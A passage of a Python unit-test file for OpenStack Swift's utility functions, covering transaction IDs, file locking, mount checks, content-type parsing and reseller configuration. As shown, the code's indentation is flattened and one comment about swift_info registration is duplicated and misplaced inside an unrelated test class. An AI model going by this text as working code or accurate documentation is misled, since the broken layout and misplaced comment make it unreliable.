utils._sys_fallocate = orig__sys_fallocate
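    # Transaction IDs are laid out as 'tx' + 21 hex characters + '-' + a
    # 10-character hex timestamp, plus any configured suffix; the assertions
    # below pin down that exact layout.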
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEqual(len(trans_id), 34)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEqual(len(trans_id), 41)
self.assertEqual(trans_id[:2], 'tx')
self.assertEqual(trans_id[34:], '-suffix')
self.assertEqual(trans_id[23], '-')
self.assertEqual(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEqual(ts, 1366428678)
self.assertEqual(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEqual(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEqual(ts, None)
def test_config_fallocate_value(self):
fallocate_value, is_percent = utils.config_fallocate_value('10%')
self.assertEqual(fallocate_value, 10)
self.assertTrue(is_percent)
fallocate_value, is_percent = utils.config_fallocate_value('10')
self.assertEqual(fallocate_value, 10)
self.assertFalse(is_percent)
try:
fallocate_value, is_percent = utils.config_fallocate_value('ab%')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: ab% is an invalid value for '
'fallocate_reserve.')
try:
fallocate_value, is_percent = utils.config_fallocate_value('ab')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: ab is an invalid value for '
'fallocate_reserve.')
try:
fallocate_value, is_percent = utils.config_fallocate_value('1%%')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: 1%% is an invalid value for '
'fallocate_reserve.')
try:
fallocate_value, is_percent = utils.config_fallocate_value('10.0')
except ValueError as err:
exc = err
self.assertEqual(str(exc), 'Error: 10.0 is an invalid value for '
'fallocate_reserve.')
fallocate_value, is_percent = utils.config_fallocate_value('10.5%')
self.assertEqual(fallocate_value, 10.5)
self.assertTrue(is_percent)
fallocate_value, is_percent = utils.config_fallocate_value('10.000%')
self.assertEqual(fallocate_value, 10.000)
self.assertTrue(is_percent)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
f.seek(0)
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
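    # The next two tests cover races around unlink: if the locked file is
    # unlinked (or unlinked and recreated) while lock_file() holds it open,
    # the file object it yields must refer to a freshly opened inode rather
    # than the stale one.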
def test_lock_file_unlinked_after_open(self):
os_open = os.open
first_pass = [True]
def deleting_open(filename, flags):
# unlink the file after it's opened. once.
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', deleting_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
first_pass = [True]
def recreating_open(filename, flags):
# unlink and recreate the file after it's opened
fd = os_open(filename, flags)
if first_pass[0]:
os.unlink(filename)
os.close(os_open(filename, os.O_CREAT | os.O_RDWR))
first_pass[0] = False
return fd
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.open', recreating_open):
with utils.lock_file(nt.name, unlink=True) as f:
self.assertNotEqual(os.fstat(nt.fileno()).st_ino,
os.fstat(f.fileno()).st_ino)
def test_lock_file_held_on_unlink(self):
os_unlink = os.unlink
def flocking_unlink(filename):
# make sure the lock is held when we unlink
fd = os.open(filename, os.O_RDWR)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
os.close(fd)
os_unlink(filename)
with NamedTemporaryFile(delete=False) as nt:
with mock.patch('os.unlink', flocking_unlink):
with utils.lock_file(nt.name, unlink=True):
pass
def test_lock_file_no_unlink_if_fail(self):
os_open = os.open
with NamedTemporaryFile(delete=True) as nt:
def lock_on_open(filename, flags):
# lock the file on another fd after it's opened.
fd = os_open(filename, flags)
fd2 = os_open(filename, flags)
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
return fd
try:
timedout = False
with mock.patch('os.open', lock_on_open):
with utils.lock_file(nt.name, unlink=False, timeout=0.01):
pass
except LockTimeout:
timedout = True
self.assertTrue(timedout)
self.assertTrue(os.path.exists(nt.name))
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
# Raises exception with _raw -- see next test.
utils.ismount(tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_raw_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount_raw, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
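    # parse_content_type() splits a Content-Type value into the media type
    # and a list of (attribute, value) parameter tuples, preserving any
    # quoting in the values.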
def test_parse_content_type(self):
self.assertEqual(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEqual(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEqual(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEqual(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 15)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEqual(listing_dict['bytes'], 1234)
self.assertEqual(listing_dict['content_type'],
'text/plain;hello="world"')
def test_extract_swift_bytes(self):
scenarios = {
# maps input value -> expected returned tuple
'': ('', None),
'text/plain': ('text/plain', None),
'text/plain; other=thing': ('text/plain;other=thing', None),
'text/plain; swift_bytes=123': ('text/plain', '123'),
'text/plain; other=thing;swift_bytes=123':
('text/plain;other=thing', '123'),
'text/plain; swift_bytes=123; other=thing':
('text/plain;other=thing', '123'),
'text/plain; swift_bytes=123; swift_bytes=456':
('text/plain', '456'),
'text/plain; swift_bytes=123; other=thing;swift_bytes=456':
('text/plain;other=thing', '456')}
for test_value, expected in scenarios.items():
self.assertEqual(expected, utils.extract_swift_bytes(test_value))
def test_clean_content_type(self):
subtests = {
'': '', 'text/plain': 'text/plain',
'text/plain; someother=thing': 'text/plain; someother=thing',
'text/plain; swift_bytes=123': 'text/plain',
'text/plain; someother=thing; swift_bytes=123':
'text/plain; someother=thing',
# Since Swift always tacks on the swift_bytes, clean_content_type()
# only strips swift_bytes if it's last. The next item simply shows
# that if for some other odd reason it's not last,
# clean_content_type() will not remove it from the header.
'text/plain; swift_bytes=123; someother=thing':
'text/plain; swift_bytes=123; someother=thing'}
for before, after in subtests.items():
self.assertEqual(utils.clean_content_type(before), after)
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEqual('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEqual('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
def test_get_hmac(self):
self.assertEqual(
utils.get_hmac('GET', '/path', 1, 'abc'),
'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f')
def test_get_policy_index(self):
# Account has no information about a policy
req = Request.blank(
'/sda1/p/a',
environ={'REQUEST_METHOD': 'GET'})
res = Response()
self.assertIsNone(utils.get_policy_index(req.headers,
res.headers))
# The policy of a container can be specified by the response header
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'})
res = Response(headers={'X-Backend-Storage-Policy-Index': '1'})
self.assertEqual('1', utils.get_policy_index(req.headers,
res.headers))
# The policy of an object to be created can be specified by the request
# header
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Backend-Storage-Policy-Index': '2'})
res = Response()
self.assertEqual('2', utils.get_policy_index(req.headers,
res.headers))
def test_get_log_line(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD', 'REMOTE_ADDR': '1.2.3.4'})
res = Response()
trans_time = 1.2
additional_info = 'some information'
server_pid = 1234
exp_line = '1.2.3.4 - - [01/Jan/1970:02:46:41 +0000] "HEAD ' \
'/sda1/p/a/c/o" 200 - "-" "-" "-" 1.2000 "some information" 1234 -'
with mock.patch(
'time.gmtime',
mock.MagicMock(side_effect=[time.gmtime(10001.0)])):
with mock.patch(
'os.getpid', mock.MagicMock(return_value=server_pid)):
self.assertEqual(
exp_line,
utils.get_log_line(req, res, trans_time, additional_info))
def test_cache_from_env(self):
# should never get logging when swift.cache is found
env = {'swift.cache': 42}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, False))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertEqual(42, utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
# check allow_none controls logging when swift.cache is not found
err_msg = 'ERROR: swift.cache could not be found in env!'
env = {}
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, False))
self.assertTrue(err_msg in logger.get_lines_for_level('error'))
logger = FakeLogger()
with mock.patch('swift.common.utils.logging', logger):
self.assertIsNone(utils.cache_from_env(env, True))
self.assertEqual(0, len(logger.get_lines_for_level('error')))
def test_fsync_dir(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
fd, temppath = tempfile.mkstemp(dir=tempdir)
_mock_fsync = mock.Mock()
_mock_close = mock.Mock()
with patch('swift.common.utils.fsync', _mock_fsync):
with patch('os.close', _mock_close):
utils.fsync_dir(tempdir)
self.assertTrue(_mock_fsync.called)
self.assertTrue(_mock_close.called)
self.assertTrue(isinstance(_mock_fsync.call_args[0][0], int))
self.assertEqual(_mock_fsync.call_args[0][0],
_mock_close.call_args[0][0])
# Not a directory - arg is file path
self.assertRaises(OSError, utils.fsync_dir, temppath)
logger = FakeLogger()
def _mock_fsync(fd):
raise OSError(errno.EBADF, os.strerror(errno.EBADF))
with patch('swift.common.utils.fsync', _mock_fsync):
with mock.patch('swift.common.utils.logging', logger):
utils.fsync_dir(tempdir)
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
finally:
if fd is not None:
os.close(fd)
os.unlink(temppath)
if tempdir:
os.rmdir(tempdir)
def test_renamer_with_fsync_dir(self):
tempdir = None
try:
tempdir = mkdtemp(dir='/tmp')
# Simulate part of object path already existing
part_dir = os.path.join(tempdir, 'objects/1234/')
os.makedirs(part_dir)
obj_dir = os.path.join(part_dir, 'aaa', 'a' * 32)
obj_path = os.path.join(obj_dir, '1425276031.12345.data')
# Object dir had to be created
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir on parents of all newly create dirs
self.assertEqual(_m_fsync_dir.call_count, 3)
# Object dir existed
_m_os_rename.reset_mock()
_m_fsync_dir.reset_mock()
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
utils.renamer("fake_path", obj_path)
_m_os_rename.assert_called_once_with('fake_path', obj_path)
# fsync_dir only on the leaf dir
self.assertEqual(_m_fsync_dir.call_count, 1)
finally:
if tempdir:
shutil.rmtree(tempdir)
def test_renamer_when_fsync_is_false(self):
_m_os_rename = mock.Mock()
_m_fsync_dir = mock.Mock()
_m_makedirs_count = mock.Mock(return_value=2)
with patch('os.rename', _m_os_rename):
with patch('swift.common.utils.fsync_dir', _m_fsync_dir):
with patch('swift.common.utils.makedirs_count',
_m_makedirs_count):
utils.renamer("fake_path", "/a/b/c.data", fsync=False)
_m_makedirs_count.assert_called_once_with("/a/b")
_m_os_rename.assert_called_once_with('fake_path', "/a/b/c.data")
self.assertFalse(_m_fsync_dir.called)
def test_makedirs_count(self):
tempdir = None
fd = None
try:
tempdir = mkdtemp(dir='/tmp')
os.makedirs(os.path.join(tempdir, 'a/b'))
# 4 new dirs created
dirpath = os.path.join(tempdir, 'a/b/1/2/3/4')
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 4)
# no new dirs created - dir already exists
ret = utils.makedirs_count(dirpath)
self.assertEqual(ret, 0)
# path exists and is a file
fd, temppath = tempfile.mkstemp(dir=dirpath)
os.close(fd)
self.assertRaises(OSError, utils.makedirs_count, temppath)
finally:
if tempdir:
shutil.rmtree(tempdir)
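# config_read_reseller_options() parses a comma-separated reseller_prefix
# setting and returns the normalized prefixes along with a per-prefix dict of
# operator_roles, service_roles and require_group, falling back to the
# supplied defaults where a prefix has no explicit configuration.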
class ResellerConfReader(unittest.TestCase):
def setUp(self):
self.default_rules = {'operator_roles': ['admin', 'swiftoperator'],
'service_roles': [],
'require_group': ''}
def test_defaults(self):
conf = {}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_same_as_default(self):
conf = {'reseller_prefix': 'AUTH',
'operator_roles': 'admin, swiftoperator'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_'])
self.assertEqual(options['AUTH_'], self.default_rules)
def test_single_blank_reseller(self):
conf = {'reseller_prefix': ''}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_single_blank_reseller_with_conf(self):
conf = {'reseller_prefix': '',
"''operator_roles": 'role1, role2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''].get('operator_roles'),
['role1', 'role2'])
self.assertEqual(options[''].get('service_roles'),
self.default_rules.get('service_roles'))
self.assertEqual(options[''].get('require_group'),
self.default_rules.get('require_group'))
def test_multiple_same_resellers(self):
conf = {'reseller_prefix': " '' , '' "}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
conf = {'reseller_prefix': '_, _'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['_'])
conf = {'reseller_prefix': 'AUTH, PRE2, AUTH, PRE2'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
def test_several_resellers_with_conf(self):
conf = {'reseller_prefix': 'PRE1, PRE2',
'PRE1_operator_roles': 'role1, role2',
'PRE1_service_roles': 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['PRE1_', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['PRE1_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['PRE1_'].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['PRE1_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_first_blank(self):
conf = {'reseller_prefix': " '' , PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_several_resellers_with_blank_comma(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_stray_comma(self):
conf = {'reseller_prefix': "AUTH ,, PRE2",
"''operator_roles": 'role1, role2',
"''service_roles": 'role3, role4',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', 'PRE2_'])
self.assertEqual(set(['admin', 'swiftoperator']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual([],
options['AUTH_'].get('service_roles'))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('', options['AUTH_'].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
def test_multiple_stray_commas_resellers(self):
conf = {'reseller_prefix': ' , , ,'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, [''])
self.assertEqual(options[''], self.default_rules)
def test_unprefixed_options(self):
conf = {'reseller_prefix': "AUTH , '', PRE2",
"operator_roles": 'role1, role2',
"service_roles": 'role3, role4',
'require_group': 'auth_blank_group',
'PRE2_operator_roles': 'role5',
'PRE2_service_roles': 'role6',
'PRE2_require_group': 'pre2_group'}
prefixes, options = utils.config_read_reseller_options(
conf, self.default_rules)
self.assertEqual(prefixes, ['AUTH_', '', 'PRE2_'])
self.assertEqual(set(['role1', 'role2']),
set(options['AUTH_'].get('operator_roles')))
self.assertEqual(set(['role1', 'role2']),
set(options[''].get('operator_roles')))
self.assertEqual(['role5'],
options['PRE2_'].get('operator_roles'))
self.assertEqual(set(['role3', 'role4']),
set(options['AUTH_'].get('service_roles')))
self.assertEqual(set(['role3', 'role4']),
set(options[''].get('service_roles')))
self.assertEqual(['role6'], options['PRE2_'].get('service_roles'))
self.assertEqual('auth_blank_group',
options['AUTH_'].get('require_group'))
self.assertEqual('auth_blank_group', options[''].get('require_group'))
self.assertEqual('pre2_group', options['PRE2_'].get('require_group'))
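# unlink_older_than() / unlink_paths_older_than() remove entries whose mtime
# predates the given cutoff; high_resolution_getmtime() serves back the exact
# timestamps recorded by touch() so these tests don't depend on filesystem
# timestamp granularity.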
class TestUnlinkOlder(unittest.TestCase):
def setUp(self):
self.tempdir = mkdtemp()
self.mtime = {}
def tearDown(self):
rmtree(self.tempdir, ignore_errors=True)
def touch(self, fpath, mtime=None):
self.mtime[fpath] = mtime or time.time()
        open(fpath, 'w').close()  # create the file; close so the fd isn't leaked
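# register_swift_info() populates the module-level _swift_info and
# _swift_admin_info registries that get_swift_info() later filters (optionally
# dropping disallowed sections); tearDown() resets both dicts so the tests
# stay independent of each other.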
@contextlib.contextmanager
def high_resolution_getmtime(self):
orig_getmtime = os.path.getmtime
def mock_getmtime(fpath):
mtime = self.mtime.get(fpath)
if mtime is None:
mtime = orig_getmtime(fpath)
return mtime
with mock.patch('os.path.getmtime', mock_getmtime):
yield
def test_unlink_older_than_path_not_exists(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_older_than(path, time.time())
def test_unlink_older_than_file(self):
path = os.path.join(self.tempdir, 'some-file')
self.touch(path)
with self.assertRaises(OSError) as ctx:
utils.unlink_older_than(path, time.time())
self.assertEqual(ctx.exception.errno, errno.ENOTDIR)
def test_unlink_older_than_now(self):
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, time.time())
self.assertEqual([], os.listdir(self.tempdir))
def test_unlink_not_old_enough(self):
start = time.time()
self.touch(os.path.join(self.tempdir, 'test'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, start)
self.assertEqual(['test'], os.listdir(self.tempdir))
def test_unlink_mixed(self):
self.touch(os.path.join(self.tempdir, 'first'))
cutoff = time.time()
self.touch(os.path.join(self.tempdir, 'second'))
with self.high_resolution_getmtime():
utils.unlink_older_than(self.tempdir, cutoff)
self.assertEqual(['second'], os.listdir(self.tempdir))
def test_unlink_paths(self):
paths = []
for item in ('first', 'second', 'third'):
path = os.path.join(self.tempdir, item)
self.touch(path)
paths.append(path)
# don't unlink everyone
with self.high_resolution_getmtime():
utils.unlink_paths_older_than(paths[:2], time.time())
self.assertEqual(['third'], os.listdir(self.tempdir))
def test_unlink_empty_paths(self):
# just make sure it doesn't blow up
utils.unlink_paths_older_than([], time.time())
def test_unlink_not_exists_paths(self):
path = os.path.join(self.tempdir, 'does-not-exist')
# just make sure it doesn't blow up
utils.unlink_paths_older_than([path], time.time())
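# register_swift_info() populates the module-level _swift_info and
# _swift_admin_info registries that get_swift_info() later filters (optionally
# dropping disallowed sections); tearDown() resets both dicts so the tests
# stay independent of each other.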
class TestSwiftInfo(unittest.TestCase):
def tearDown(self):
utils._swift_info = {}
utils._swift_admin_info = {}
def test_register_swift_info(self):
utils.register_swift_info(foo='bar')
utils.register_swift_info(lorem='ipsum')
utils.register_swift_info('cap1', cap1_foo='cap1_bar')
utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
self.assertTrue('swift' in utils._swift_info)
self.assertTrue('foo' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('lorem' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum')
self.assertTrue('cap1' in utils._swift_info)
self.assertTrue('cap1_foo' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
self.assertTrue('cap1_lorem' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum')
self.assertRaises(ValueError,
utils.register_swift_info, 'admin', foo='bar')
self.assertRaises(ValueError,
utils.register_swift_info, 'disallowed_sections',
disallowed_sections=None)
utils.register_swift_info('goodkey', foo='5.6')
self.assertRaises(ValueError,
utils.register_swift_info, 'bad.key', foo='5.6')
data = {'bad.key': '5.6'}
self.assertRaises(ValueError,
utils.register_swift_info, 'goodkey', **data)
def test_get_swift_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info()
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
